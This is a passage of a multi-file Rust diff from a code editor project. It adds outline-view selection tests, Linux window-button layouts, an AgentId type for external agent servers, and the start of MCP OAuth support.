+ });
+ let deepest_containing_candidate_id = delegate
+ .outline
+ .items
+ .iter()
+ .enumerate()
+ .filter_map(|(ix, item)| {
+ item.range
+ .to_offset(&buffer)
+ .contains(&cursor_offset)
+ .then_some((ix, item.depth))
+ })
+ .max_by(|(ix_a, depth_a), (ix_b, depth_b)| {
+ depth_a.cmp(depth_b).then(ix_b.cmp(ix_a))
+ })
+ .map(|(ix, _)| ix)
+ .unwrap();
+ (selected_candidate_id, deepest_containing_candidate_id)
+ });
+ assert_eq!(
+ selected_candidate_id, expected_deepest_containing_candidate_id,
+ "Empty query should select the deepest symbol containing the cursor"
+ );
+
+ cx.dispatch_action(menu::Cancel);
+ cx.run_until_parked();
+
+ set_single_caret_at_row(&editor, 0, cx);
+ let outline_view = open_outline_view(&workspace, cx);
+ cx.run_until_parked();
+ let selected_candidate_id = outline_view.read_with(cx, |outline_view, _| {
+ let delegate = &outline_view.delegate;
+ delegate.matches[delegate.selected_match_index].candidate_id
+ });
+ assert_eq!(
+ selected_candidate_id, 0,
+ "Empty query should fall back to the first symbol when cursor is outside all symbol ranges"
+ );
+ }
+
+ #[gpui::test]
+ async fn test_outline_filtered_selection_prefers_first_match_on_score_ties(
+ cx: &mut TestAppContext,
+ ) {
+ init_test(cx);
+
+ let fs = FakeFs::new(cx.executor());
+ fs.insert_tree(
+ path!("/dir"),
+ json!({
+ "a.rs": indoc! {"
+ struct A;
+ impl A {
+ fn f(&self) {}
+ fn g(&self) {}
+ }
+
+ struct B;
+ impl B {
+ fn f(&self) {}
+ fn g(&self) {}
+ }
+
+ struct C;
+ impl C {
+ fn f(&self) {}
+ fn g(&self) {}
+ }
+ "}
+ }),
+ )
+ .await;
+
+ let project = Project::test(fs, [path!("/dir").as_ref()], cx).await;
+ project.read_with(cx, |project, _| {
+ project.languages().add(language::rust_lang())
+ });
+
+ let (workspace, cx) =
+ cx.add_window_view(|window, cx| MultiWorkspace::test_new(project.clone(), window, cx));
+
+ let workspace = cx.read(|cx| workspace.read(cx).workspace().clone());
+ let worktree_id = workspace.update(cx, |workspace, cx| {
+ workspace.project().update(cx, |project, cx| {
+ project.worktrees(cx).next().unwrap().read(cx).id()
+ })
+ });
+ let _buffer = project
+ .update(cx, |project, cx| {
+ project.open_local_buffer(path!("/dir/a.rs"), cx)
+ })
+ .await
+ .unwrap();
+ let editor = workspace
+ .update_in(cx, |workspace, window, cx| {
+ workspace.open_path((worktree_id, rel_path("a.rs")), None, true, window, cx)
+ })
+ .await
+ .unwrap()
+ .downcast::<Editor>()
+ .unwrap();
+
+ assert_single_caret_at_row(&editor, 0, cx);
+ let outline_view = open_outline_view(&workspace, cx);
+ let match_ids = |outline_view: &Entity<Picker<OutlineViewDelegate>>,
+ cx: &mut VisualTestContext| {
+ outline_view.read_with(cx, |outline_view, _| {
+ let delegate = &outline_view.delegate;
+ let selected_match = &delegate.matches[delegate.selected_match_index];
+ let scored_ids = delegate
+ .matches
+ .iter()
+ .filter(|m| m.score > 0.0)
+ .map(|m| m.candidate_id)
+ .collect::<Vec<_>>();
+ (
+ selected_match.candidate_id,
+ *scored_ids.first().unwrap(),
+ *scored_ids.last().unwrap(),
+ scored_ids.len(),
+ )
+ })
+ };
+
+ outline_view
+ .update_in(cx, |outline_view, window, cx| {
+ outline_view
+ .delegate
+ .update_matches("f".to_string(), window, cx)
+ })
+ .await;
+ let (selected_id, first_scored_id, last_scored_id, scored_match_count) =
+ match_ids(&outline_view, cx);
+
+ assert!(
+ scored_match_count > 1,
+ "Expected multiple scored matches for `f` in outline filtering"
+ );
+ assert_eq!(
+ selected_id, first_scored_id,
+ "Filtered query should pick the first scored match when scores tie"
+ );
+ assert_ne!(
+ selected_id, last_scored_id,
+ "Selection should not default to the last scored match"
+ );
+
+ set_single_caret_at_row(&editor, 12, cx);
+ outline_view
+ .update_in(cx, |outline_view, window, cx| {
+ outline_view
+ .delegate
+ .update_matches("f".to_string(), window, cx)
+ })
+ .await;
+ let (selected_id, first_scored_id, last_scored_id, scored_match_count) =
+ match_ids(&outline_view, cx);
+
+ assert!(
+ scored_match_count > 1,
+ "Expected multiple scored matches for `f` in outline filtering"
+ );
+ assert_eq!(
+ selected_id, first_scored_id,
+ "Filtered selection should stay score-ordered and not switch based on cursor proximity"
+ );
+ assert_ne!(
+ selected_id, last_scored_id,
+ "Selection should not default to the last scored match"
+ );
+ }
+
fn open_outline_view(
workspace: &Entity<Workspace>,
cx: &mut VisualTestContext,
@@ -634,6 +875,18 @@ mod tests {
})
}
+ fn set_single_caret_at_row(
+ editor: &Entity<Editor>,
+ buffer_row: u32,
+ cx: &mut VisualTestContext,
+ ) {
+ editor.update_in(cx, |editor, window, cx| {
+ editor.change_selections(SelectionEffects::no_scroll(), window, cx, |s| {
+ s.select_ranges([rope::Point::new(buffer_row, 0)..rope::Point::new(buffer_row, 0)])
+ });
+ });
+ }
+
fn init_test(cx: &mut TestAppContext) -> Arc<AppState> {
cx.update(|cx| {
let state = AppState::test(cx);
@@ -2,7 +2,7 @@ mod outline_panel_settings;
use anyhow::Context as _;
use collections::{BTreeSet, HashMap, HashSet, hash_map};
-use db::kvp::KEY_VALUE_STORE;
+use db::kvp::KeyValueStore;
use editor::{
AnchorRangeExt, Bias, DisplayPoint, Editor, EditorEvent, ExcerptId, ExcerptRange,
MultiBufferSnapshot, RangeToAnchorExt, SelectionEffects,
@@ -693,16 +693,18 @@ impl OutlinePanel {
.ok()
.flatten()
{
- Some(serialization_key) => cx
- .background_spawn(async move { KEY_VALUE_STORE.read_kvp(&serialization_key) })
- .await
- .context("loading outline panel")
- .log_err()
- .flatten()
- .map(|panel| serde_json::from_str::<SerializedOutlinePanel>(&panel))
- .transpose()
- .log_err()
- .flatten(),
+ Some(serialization_key) => {
+ let kvp = cx.update(|_, cx| KeyValueStore::global(cx))?;
+ cx.background_spawn(async move { kvp.read_kvp(&serialization_key) })
+ .await
+ .context("loading outline panel")
+ .log_err()
+ .flatten()
+ .map(|panel| serde_json::from_str::<SerializedOutlinePanel>(&panel))
+ .transpose()
+ .log_err()
+ .flatten()
+ }
None => None,
};
@@ -958,14 +960,14 @@ impl OutlinePanel {
};
let width = self.width;
let active = Some(self.active);
+ let kvp = KeyValueStore::global(cx);
self.pending_serialization = cx.background_spawn(
async move {
- KEY_VALUE_STORE
- .write_kvp(
- serialization_key,
- serde_json::to_string(&SerializedOutlinePanel { width, active })?,
- )
- .await?;
+ kvp.write_kvp(
+ serialization_key,
+ serde_json::to_string(&SerializedOutlinePanel { width, active })?,
+ )
+ .await?;
anyhow::Ok(())
}
.log_err(),
@@ -1488,13 +1490,7 @@ impl OutlinePanel {
let context_menu = ContextMenu::build(window, cx, |menu, _, _| {
menu.context(self.focus_handle.clone())
.action(
- if cfg!(target_os = "macos") {
- "Reveal in Finder"
- } else if cfg!(target_os = "windows") {
- "Reveal in File Explorer"
- } else {
- "Reveal in File Manager"
- },
+ ui::utils::reveal_in_file_manager_label(false),
Box::new(RevealInFileManager),
)
.action("Open in Terminal", Box::new(OpenInTerminal))
@@ -5073,7 +5069,7 @@ impl Panel for OutlinePanel {
}
fn activation_priority(&self) -> u32 {
- 5
+ 6
}
}
@@ -52,7 +52,6 @@ pub fn panel_button(label: impl Into<SharedString>) -> ui::Button {
let id = ElementId::Name(label.to_lowercase().replace(' ', "_").into());
ui::Button::new(id, label)
.label_size(ui::LabelSize::Small)
- .icon_size(ui::IconSize::Small)
// TODO: Change this once we use on_surface_bg in button_like
.layer(ui::ElevationIndex::ModalSurface)
.size(ui::ButtonSize::Compact)
@@ -788,6 +788,12 @@ impl<D: PickerDelegate> Picker<D> {
this.handle_click(ix, event.modifiers.platform, window, cx)
}),
)
+ .on_hover(cx.listener(move |this, hovered: &bool, window, cx| {
+ if *hovered {
+ this.set_selected_index(ix, None, false, window, cx);
+ cx.notify();
+ }
+ }))
.children(self.delegate.render_match(
ix,
ix == self.delegate.selected_index(),
@@ -3,9 +3,9 @@ mod system_window_tabs;
use feature_flags::{AgentV2FeatureFlag, FeatureFlagAppExt};
use gpui::{
- AnyElement, App, Context, Decorations, Entity, Hsla, InteractiveElement, IntoElement,
- MouseButton, ParentElement, StatefulInteractiveElement, Styled, Window, WindowControlArea, div,
- px,
+ Action, AnyElement, App, Context, Decorations, Entity, Hsla, InteractiveElement, IntoElement,
+ MouseButton, ParentElement, StatefulInteractiveElement, Styled, Window, WindowButtonLayout,
+ WindowControlArea, div, px,
};
use project::DisableAiSettings;
use settings::Settings;
@@ -31,8 +31,8 @@ pub struct PlatformTitleBar {
children: SmallVec<[AnyElement; 2]>,
should_move: bool,
system_window_tabs: Entity<SystemWindowTabs>,
+ button_layout: Option<WindowButtonLayout>,
workspace_sidebar_open: bool,
- sidebar_has_notifications: bool,
}
impl PlatformTitleBar {
@@ -46,8 +46,8 @@ impl PlatformTitleBar {
children: SmallVec::new(),
should_move: false,
system_window_tabs,
+ button_layout: None,
workspace_sidebar_open: false,
- sidebar_has_notifications: false,
}
}
@@ -70,6 +70,24 @@ impl PlatformTitleBar {
self.children = children.into_iter().collect();
}
+ pub fn set_button_layout(&mut self, button_layout: Option<WindowButtonLayout>) {
+ self.button_layout = button_layout;
+ }
+
+ fn effective_button_layout(
+ &self,
+ decorations: &Decorations,
+ cx: &App,
+ ) -> Option<WindowButtonLayout> {
+ if self.platform_style == PlatformStyle::Linux
+ && matches!(decorations, Decorations::Client { .. })
+ {
+ self.button_layout.or_else(|| cx.button_layout())
+ } else {
+ None
+ }
+ }
+
pub fn init(cx: &mut App) {
SystemWindowTabs::init(cx);
}
@@ -83,19 +101,6 @@ impl PlatformTitleBar {
cx.notify();
}
- pub fn sidebar_has_notifications(&self) -> bool {
- self.sidebar_has_notifications
- }
-
- pub fn set_sidebar_has_notifications(
- &mut self,
- has_notifications: bool,
- cx: &mut Context<Self>,
- ) {
- self.sidebar_has_notifications = has_notifications;
- cx.notify();
- }
-
pub fn is_multi_workspace_enabled(cx: &App) -> bool {
cx.has_flag::<AgentV2FeatureFlag>() && !DisableAiSettings::get_global(cx).disable_ai
}
@@ -110,6 +115,7 @@ impl Render for PlatformTitleBar {
let close_action = Box::new(workspace::CloseWindow);
let children = mem::take(&mut self.children);
+ let button_layout = self.effective_button_layout(&decorations, cx);
let is_multiworkspace_sidebar_open =
PlatformTitleBar::is_multi_workspace_enabled(cx) && self.is_workspace_sidebar_open();
@@ -165,6 +171,14 @@ impl Render for PlatformTitleBar {
&& !is_multiworkspace_sidebar_open
{
this.pl(px(TRAFFIC_LIGHT_PADDING))
+ } else if let Some(button_layout) =
+ button_layout.filter(|button_layout| button_layout.left[0].is_some())
+ {
+ this.child(platform_linux::LinuxWindowControls::new(
+ "left-window-controls",
+ button_layout.left,
+ close_action.as_ref().boxed_clone(),
+ ))
} else {
this.pl_2()
}
@@ -203,14 +217,22 @@ impl Render for PlatformTitleBar {
PlatformStyle::Mac => title_bar,
PlatformStyle::Linux => {
if matches!(decorations, Decorations::Client { .. }) {
- title_bar
- .child(platform_linux::LinuxWindowControls::new(close_action))
- .when(supported_controls.window_menu, |titlebar| {
- titlebar
- .on_mouse_down(MouseButton::Right, move |ev, window, _| {
- window.show_window_menu(ev.position)
- })
+ let mut result = title_bar;
+ if let Some(button_layout) = button_layout
+ .filter(|button_layout| button_layout.right[0].is_some())
+ {
+ result = result.child(platform_linux::LinuxWindowControls::new(
+ "right-window-controls",
+ button_layout.right,
+ close_action.as_ref().boxed_clone(),
+ ));
+ }
+
+ result.when(supported_controls.window_menu, |titlebar| {
+ titlebar.on_mouse_down(MouseButton::Right, move |ev, window, _| {
+ window.show_window_menu(ev.position)
})
+ })
} else {
title_bar
}
@@ -1,46 +1,83 @@
-use gpui::{Action, Hsla, MouseButton, prelude::*, svg};
+use gpui::{
+ Action, AnyElement, Hsla, MAX_BUTTONS_PER_SIDE, MouseButton, WindowButton, prelude::*, svg,
+};
use ui::prelude::*;
#[derive(IntoElement)]
pub struct LinuxWindowControls {
- close_window_action: Box<dyn Action>,
+ id: &'static str,
+ buttons: [Option<WindowButton>; MAX_BUTTONS_PER_SIDE],
+ close_action: Box<dyn Action>,
}
impl LinuxWindowControls {
- pub fn new(close_window_action: Box<dyn Action>) -> Self {
+ pub fn new(
+ id: &'static str,
+ buttons: [Option<WindowButton>; MAX_BUTTONS_PER_SIDE],
+ close_action: Box<dyn Action>,
+ ) -> Self {
Self {
- close_window_action,
+ id,
+ buttons,
+ close_action,
}
}
}
impl RenderOnce for LinuxWindowControls {
fn render(self, window: &mut Window, cx: &mut App) -> impl IntoElement {
+ let is_maximized = window.is_maximized();
+ let supported_controls = window.window_controls();
+ let button_elements: Vec<AnyElement> = self
+ .buttons
+ .iter()
+ .filter_map(|b| *b)
+ .filter(|button| match button {
+ WindowButton::Minimize => supported_controls.minimize,
+ WindowButton::Maximize => supported_controls.maximize,
+ WindowButton::Close => true,
+ })
+ .map(|button| {
+ create_window_button(button, button.id(), is_maximized, &*self.close_action, cx)
+ })
+ .collect();
+
h_flex()
- .id("generic-window-controls")
- .px_3()
- .gap_3()
- .on_mouse_down(MouseButton::Left, |_, _, cx| cx.stop_propagation())
- .child(WindowControl::new(
- "minimize",
- WindowControlType::Minimize,
- cx,
- ))
- .child(WindowControl::new(
- "maximize-or-restore",
- if window.is_maximized() {
- WindowControlType::Restore
- } else {
- WindowControlType::Maximize
- },
- cx,
- ))
- .child(WindowControl::new_close(
- "close",
- WindowControlType::Close,
- self.close_window_action,
- cx,
- ))
+ .id(self.id)
+ .when(!button_elements.is_empty(), |el| {
+ el.gap_3()
+ .px_3()
+ .on_mouse_down(MouseButton::Left, |_, _, cx| cx.stop_propagation())
+ .children(button_elements)
+ })
+ }
+}
+
+fn create_window_button(
+ button: WindowButton,
+ id: &'static str,
+ is_maximized: bool,
+ close_action: &dyn Action,
+ cx: &mut App,
+) -> AnyElement {
+ match button {
+ WindowButton::Minimize => {
+ WindowControl::new(id, WindowControlType::Minimize, cx).into_any_element()
+ }
+ WindowButton::Maximize => WindowControl::new(
+ id,
+ if is_maximized {
+ WindowControlType::Restore
+ } else {
+ WindowControlType::Maximize
+ },
+ cx,
+ )
+ .into_any_element(),
+ WindowButton::Close => {
+ WindowControl::new_close(id, WindowControlType::Close, close_action.boxed_clone(), cx)
+ .into_any_element()
+ }
}
}
@@ -45,6 +45,7 @@ client.workspace = true
clock.workspace = true
collections.workspace = true
context_server.workspace = true
+credentials_provider.workspace = true
dap.workspace = true
extension.workspace = true
fancy-regex.workspace = true
@@ -11,18 +11,19 @@ use http_client::{AsyncBody, HttpClient};
use serde::Deserialize;
use settings::Settings as _;
-use crate::DisableAiSettings;
+use crate::{AgentId, DisableAiSettings};
const REGISTRY_URL: &str = "https://cdn.agentclientprotocol.com/registry/v1/latest/registry.json";
const REFRESH_THROTTLE_DURATION: Duration = Duration::from_secs(60 * 60);
#[derive(Clone, Debug)]
pub struct RegistryAgentMetadata {
- pub id: SharedString,
+ pub id: AgentId,
pub name: SharedString,
pub description: SharedString,
pub version: SharedString,
pub repository: Option<SharedString>,
+ pub website: Option<SharedString>,
pub icon_path: Option<SharedString>,
}
@@ -55,7 +56,7 @@ impl RegistryAgent {
}
}
- pub fn id(&self) -> &SharedString {
+ pub fn id(&self) -> &AgentId {
&self.metadata().id
}
@@ -75,6 +76,10 @@ impl RegistryAgent {
self.metadata().repository.as_ref()
}
+ pub fn website(&self) -> Option<&SharedString> {
+ self.metadata().website.as_ref()
+ }
+
pub fn icon_path(&self) -> Option<&SharedString> {
self.metadata().icon_path.as_ref()
}
@@ -167,8 +172,8 @@ impl AgentRegistryStore {
&self.agents
}
- pub fn agent(&self, id: &str) -> Option<&RegistryAgent> {
- self.agents.iter().find(|agent| agent.id().as_ref() == id)
+ pub fn agent(&self, id: &AgentId) -> Option<&RegistryAgent> {
+ self.agents.iter().find(|agent| agent.id() == id)
}
pub fn is_fetching(&self) -> bool {
@@ -364,11 +369,12 @@ async fn build_registry_agents(
.await?;
let metadata = RegistryAgentMetadata {
- id: entry.id.into(),
+ id: AgentId::new(entry.id),
name: entry.name.into(),
description: entry.description.into(),
version: entry.version.into(),
repository: entry.repository.map(Into::into),
+ website: entry.website.map(Into::into),
icon_path,
};
@@ -568,6 +574,8 @@ struct RegistryEntry {
#[serde(default)]
repository: Option<String>,
#[serde(default)]
+ website: Option<String>,
+ #[serde(default)]
icon: Option<String>,
distribution: RegistryDistribution,
}
@@ -61,28 +61,43 @@ impl std::fmt::Debug for AgentServerCommand {
}
}
-#[derive(Clone, Debug, PartialEq, Eq, Hash, PartialOrd, Ord)]
-pub struct ExternalAgentServerName(pub SharedString);
+#[derive(
+ Clone, Debug, PartialEq, Eq, Hash, PartialOrd, Ord, Serialize, Deserialize, JsonSchema,
+)]
+#[serde(transparent)]
+pub struct AgentId(pub SharedString);
+
+impl AgentId {
+ pub fn new(id: impl Into<SharedString>) -> Self {
+ AgentId(id.into())
+ }
+}
-impl std::fmt::Display for ExternalAgentServerName {
+impl std::fmt::Display for AgentId {
fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
write!(f, "{}", self.0)
}
}
-impl From<&'static str> for ExternalAgentServerName {
+impl From<&'static str> for AgentId {
fn from(value: &'static str) -> Self {
- ExternalAgentServerName(value.into())
+ AgentId(value.into())
}
}
-impl From<ExternalAgentServerName> for SharedString {
- fn from(value: ExternalAgentServerName) -> Self {
+impl From<AgentId> for SharedString {
+ fn from(value: AgentId) -> Self {
value.0
}
}
-impl std::borrow::Borrow<str> for ExternalAgentServerName {
+impl AsRef<str> for AgentId {
+ fn as_ref(&self) -> &str {
+ &self.0
+ }
+}
+
+impl std::borrow::Borrow<str> for AgentId {
fn borrow(&self) -> &str {
&self.0
}
@@ -100,7 +115,6 @@ pub trait ExternalAgentServer {
fn get_command(
&mut self,
extra_env: HashMap<String, String>,
- status_tx: Option<watch::Sender<SharedString>>,
new_version_available_tx: Option<watch::Sender<Option<String>>>,
cx: &mut AsyncApp,
) -> Task<Result<AgentServerCommand>>;
@@ -164,7 +178,7 @@ impl ExternalAgentEntry {
pub struct AgentServerStore {
state: AgentServerStoreState,
- pub external_agents: HashMap<ExternalAgentServerName, ExternalAgentEntry>,
+ pub external_agents: HashMap<AgentId, ExternalAgentEntry>,
}
pub struct AgentServersUpdated;
@@ -229,7 +243,7 @@ impl AgentServerStore {
.as_ref()
.map(|path| SharedString::from(path.clone()));
let icon = icon_path;
- let agent_server_name = ExternalAgentServerName(agent_name.clone().into());
+ let agent_server_name = AgentId(agent_name.clone().into());
self.external_agents
.entry(agent_server_name.clone())
.and_modify(|entry| {
@@ -243,7 +257,6 @@ impl AgentServerStore {
project_id: *project_id,
upstream_client: upstream_client.clone(),
name: agent_server_name.clone(),
- status_tx: None,
new_version_available_tx: None,
})
as Box<dyn ExternalAgentServer>,
@@ -287,13 +300,13 @@ impl AgentServerStore {
cx.emit(AgentServersUpdated);
}
- pub fn agent_icon(&self, name: &ExternalAgentServerName) -> Option<SharedString> {
+ pub fn agent_icon(&self, name: &AgentId) -> Option<SharedString> {
self.external_agents
.get(name)
.and_then(|entry| entry.icon.clone())
}
- pub fn agent_source(&self, name: &ExternalAgentServerName) -> Option<ExternalAgentSource> {
+ pub fn agent_source(&self, name: &AgentId) -> Option<ExternalAgentSource> {
self.external_agents.get(name).map(|entry| entry.source)
}
}
@@ -339,7 +352,7 @@ pub fn resolve_extension_icon_path(
}
impl AgentServerStore {
- pub fn agent_display_name(&self, name: &ExternalAgentServerName) -> Option<SharedString> {
+ pub fn agent_display_name(&self, name: &AgentId) -> Option<SharedString> {
self.external_agents
.get(name)
.and_then(|entry| entry.display_name.clone())
@@ -347,7 +360,6 @@ impl AgentServerStore {
pub fn init_remote(session: &AnyProtoClient) {
session.add_entity_message_handler(Self::handle_external_agents_updated);
- session.add_entity_message_handler(Self::handle_loading_status_updated);
session.add_entity_message_handler(Self::handle_new_version_available);
}
@@ -427,7 +439,7 @@ impl AgentServerStore {
// Insert extension agents before custom/registry so registry entries override extensions.
for (agent_name, ext_id, targets, env, icon_path, display_name) in extension_agents.iter() {
- let name = ExternalAgentServerName(agent_name.clone().into());
+ let name = AgentId(agent_name.clone().into());
let mut env = env.clone();
if let Some(settings_env) =
new_settings
@@ -466,7 +478,7 @@ impl AgentServerStore {
for (name, settings) in new_settings.iter() {
match settings {
CustomAgentServerSettings::Custom { command, .. } => {
- let agent_name = ExternalAgentServerName(name.clone().into());
+ let agent_name = AgentId(name.clone().into());
self.external_agents.insert(
agent_name.clone(),
ExternalAgentEntry::new(
@@ -488,7 +500,7 @@ impl AgentServerStore {
continue;
};
- let agent_name = ExternalAgentServerName(name.clone().into());
+ let agent_name = AgentId(name.clone().into());
match agent {
RegistryAgent::Binary(agent) => {
if !agent.supports_current_platform {
@@ -653,7 +665,7 @@ impl AgentServerStore {
pub fn get_external_agent(
&mut self,
- name: &ExternalAgentServerName,
+ name: &AgentId,
) -> Option<&mut (dyn ExternalAgentServer + 'static)> {
self.external_agents
.get_mut(name)
@@ -671,7 +683,7 @@ impl AgentServerStore {
}
}
- pub fn external_agents(&self) -> impl Iterator<Item = &ExternalAgentServerName> {
+ pub fn external_agents(&self) -> impl Iterator<Item = &AgentId> {
self.external_agents.keys()
}
@@ -695,57 +707,38 @@ impl AgentServerStore {
.get_mut(&*envelope.payload.name)
.map(|entry| entry.server.as_mut())
.with_context(|| format!("agent `{}` not found", envelope.payload.name))?;
- let (status_tx, new_version_available_tx) = downstream_client
- .clone()
- .map(|(project_id, downstream_client)| {
- let (status_tx, mut status_rx) = watch::channel(SharedString::from(""));
- let (new_version_available_tx, mut new_version_available_rx) =
- watch::channel(None);
- cx.spawn({
- let downstream_client = downstream_client.clone();
- let name = envelope.payload.name.clone();
- async move |_, _| {
- while let Some(status) = status_rx.recv().await.ok() {
- downstream_client.send(
- proto::ExternalAgentLoadingStatusUpdated {
- project_id,
- name: name.clone(),
- status: status.to_string(),
- },
- )?;
+ let new_version_available_tx =
+ downstream_client
+ .clone()
+ .map(|(project_id, downstream_client)| {
+ let (new_version_available_tx, mut new_version_available_rx) =
+ watch::channel(None);
+ cx.spawn({
+ let name = envelope.payload.name.clone();
+ async move |_, _| {
+ if let Some(version) =
+ new_version_available_rx.recv().await.ok().flatten()
+ {
+ downstream_client.send(
+ proto::NewExternalAgentVersionAvailable {
+ project_id,
+ name: name.clone(),
+ version,
+ },
+ )?;
+ }
+ anyhow::Ok(())
}
- anyhow::Ok(())
- }
- })
- .detach_and_log_err(cx);
- cx.spawn({
- let name = envelope.payload.name.clone();
- async move |_, _| {
- if let Some(version) =
- new_version_available_rx.recv().await.ok().flatten()
- {
- downstream_client.send(
- proto::NewExternalAgentVersionAvailable {
- project_id,
- name: name.clone(),
- version,
- },
- )?;
- }
- anyhow::Ok(())
- }
- })
- .detach_and_log_err(cx);
- (status_tx, new_version_available_tx)
- })
- .unzip();
+ })
+ .detach_and_log_err(cx);
+ new_version_available_tx
+ });
let mut extra_env = HashMap::default();
if no_browser {
extra_env.insert("NO_BROWSER".to_owned(), "1".to_owned());
}
anyhow::Ok(agent.get_command(
extra_env,
- status_tx,
new_version_available_tx,
&mut cx.to_async(),
))
@@ -782,13 +775,11 @@ impl AgentServerStore {
};
let mut previous_entries = std::mem::take(&mut this.external_agents);
- let mut status_txs = HashMap::default();
let mut new_version_available_txs = HashMap::default();
let mut metadata = HashMap::default();
for (name, mut entry) in previous_entries.drain() {
if let Some(agent) = entry.server.downcast_mut::<RemoteExternalAgentServer>() {
- status_txs.insert(name.clone(), agent.status_tx.take());
new_version_available_txs
.insert(name.clone(), agent.new_version_available_tx.take());
}
@@ -801,12 +792,12 @@ impl AgentServerStore {
.names
.into_iter()
.map(|name| {
- let agent_name = ExternalAgentServerName(name.into());
+ let agent_id = AgentId(name.into());
let (icon, display_name, source) = metadata
- .remove(&agent_name)
+ .remove(&agent_id)
.or_else(|| {
AgentRegistryStore::try_global(cx)
- .and_then(|store| store.read(cx).agent(&agent_name.0))
+ .and_then(|store| store.read(cx).agent(&agent_id))
.map(|s| {
(
s.icon_path().cloned(),
@@ -819,14 +810,13 @@ impl AgentServerStore {
let agent = RemoteExternalAgentServer {
project_id: *project_id,
upstream_client: upstream_client.clone(),
- name: agent_name.clone(),
- status_tx: status_txs.remove(&agent_name).flatten(),
+ name: agent_id.clone(),
new_version_available_tx: new_version_available_txs
- .remove(&agent_name)
+ .remove(&agent_id)
.flatten(),
};
(
- agent_name,
+ agent_id,
ExternalAgentEntry::new(
Box::new(agent) as Box<dyn ExternalAgentServer>,
source,
@@ -884,22 +874,6 @@ impl AgentServerStore {
})
}
- async fn handle_loading_status_updated(
- this: Entity<Self>,
- envelope: TypedEnvelope<proto::ExternalAgentLoadingStatusUpdated>,
- mut cx: AsyncApp,
- ) -> Result<()> {
- this.update(&mut cx, |this, _| {
- if let Some(agent) = this.external_agents.get_mut(&*envelope.payload.name)
- && let Some(agent) = agent.server.downcast_mut::<RemoteExternalAgentServer>()
- && let Some(status_tx) = &mut agent.status_tx
- {
- status_tx.send(envelope.payload.status.into()).ok();
- }
- });
- Ok(())
- }
-
async fn handle_new_version_available(
this: Entity<Self>,
envelope: TypedEnvelope<proto::NewExternalAgentVersionAvailable>,
@@ -918,10 +892,7 @@ impl AgentServerStore {
Ok(())
}
- pub fn get_extension_id_for_agent(
- &mut self,
- name: &ExternalAgentServerName,
- ) -> Option<Arc<str>> {
+ pub fn get_extension_id_for_agent(&mut self, name: &AgentId) -> Option<Arc<str>> {
self.external_agents.get_mut(name).and_then(|entry| {
entry
.server
@@ -935,8 +906,7 @@ impl AgentServerStore {
struct RemoteExternalAgentServer {
project_id: u64,
upstream_client: Entity<RemoteClient>,
- name: ExternalAgentServerName,
- status_tx: Option<watch::Sender<SharedString>>,
+ name: AgentId,
new_version_available_tx: Option<watch::Sender<Option<String>>>,
}
@@ -944,14 +914,12 @@ impl ExternalAgentServer for RemoteExternalAgentServer {
fn get_command(
&mut self,
extra_env: HashMap<String, String>,
- status_tx: Option<watch::Sender<SharedString>>,
new_version_available_tx: Option<watch::Sender<Option<String>>>,
cx: &mut AsyncApp,
) -> Task<Result<AgentServerCommand>> {
let project_id = self.project_id;
let name = self.name.to_string();
let upstream_client = self.upstream_client.downgrade();
- self.status_tx = status_tx;
self.new_version_available_tx = new_version_available_tx;
cx.spawn(async move |cx| {
let mut response = upstream_client
@@ -1005,7 +973,6 @@ impl ExternalAgentServer for LocalExtensionArchiveAgent {
fn get_command(
&mut self,
extra_env: HashMap<String, String>,
- _status_tx: Option<watch::Sender<SharedString>>,
_new_version_available_tx: Option<watch::Sender<Option<String>>>,
cx: &mut AsyncApp,
) -> Task<Result<AgentServerCommand>> {
@@ -1205,7 +1172,6 @@ impl ExternalAgentServer for LocalRegistryArchiveAgent {
fn get_command(
&mut self,
extra_env: HashMap<String, String>,
- _status_tx: Option<watch::Sender<SharedString>>,
_new_version_available_tx: Option<watch::Sender<Option<String>>>,
cx: &mut AsyncApp,
) -> Task<Result<AgentServerCommand>> {
@@ -1386,7 +1352,6 @@ impl ExternalAgentServer for LocalRegistryNpxAgent {
fn get_command(
&mut self,
extra_env: HashMap<String, String>,
- _status_tx: Option<watch::Sender<SharedString>>,
_new_version_available_tx: Option<watch::Sender<Option<String>>>,
cx: &mut AsyncApp,
) -> Task<Result<AgentServerCommand>> {
@@ -1409,13 +1374,8 @@ impl ExternalAgentServer for LocalRegistryNpxAgent {
.await
.unwrap_or_default();
- let mut exec_args = Vec::new();
- exec_args.push("--yes".to_string());
- exec_args.push(package.to_string());
- if !args.is_empty() {
- exec_args.push("--".to_string());
- exec_args.extend(args);
- }
+ let mut exec_args = vec!["--yes".to_string(), "--".to_string(), package.to_string()];
+ exec_args.extend(args);
let npm_command = node_runtime
.npm_command(
@@ -1453,7 +1413,6 @@ impl ExternalAgentServer for LocalCustomAgent {
fn get_command(
&mut self,
extra_env: HashMap<String, String>,
- _status_tx: Option<watch::Sender<SharedString>>,
_new_version_available_tx: Option<watch::Sender<Option<String>>>,
cx: &mut AsyncApp,
) -> Task<Result<AgentServerCommand>> {
@@ -1482,10 +1441,6 @@ impl ExternalAgentServer for LocalCustomAgent {
}
}
-pub const GEMINI_NAME: &str = "gemini";
-pub const CLAUDE_AGENT_NAME: &str = "claude-acp";
-pub const CODEX_NAME: &str = "codex-acp";
-
#[derive(Default, Clone, JsonSchema, Debug, PartialEq, RegisterSetting)]
pub struct AllAgentServersSettings(pub HashMap<String, CustomAgentServerSettings>);
@@ -527,7 +527,10 @@ impl LocalBufferStore {
let new_file = if let Some(entry) = snapshot_entry {
File {
disk_state: match entry.mtime {
- Some(mtime) => DiskState::Present { mtime },
+ Some(mtime) => DiskState::Present {
+ mtime,
+ size: entry.size,
+ },
None => old_file.disk_state,
},
is_local: true,
@@ -7,10 +7,16 @@ use std::time::Duration;
use anyhow::{Context as _, Result};
use collections::{HashMap, HashSet};
+use context_server::oauth::{self, McpOAuthTokenProvider, OAuthDiscovery, OAuthSession};
+use context_server::transport::{HttpTransport, TransportError};
use context_server::{ContextServer, ContextServerCommand, ContextServerId};
-use futures::{FutureExt as _, future::Either, future::join_all};
+use credentials_provider::CredentialsProvider;
+use futures::future::Either;
+use futures::{FutureExt as _, StreamExt as _, future::join_all};
use gpui::{App, AsyncApp, Context, Entity, EventEmitter, Subscription, Task, WeakEntity, actions};
+use http_client::HttpClient;
use itertools::Itertools;
+use rand::Rng as _;
use registry::ContextServerDescriptorRegistry;
use remote::RemoteClient;
use rpc::{AnyProtoClient, TypedEnvelope, proto};
@@ -45,6 +51,12 @@ pub enum ContextServerStatus {
Running,
Stopped,
Error(Arc<str>),
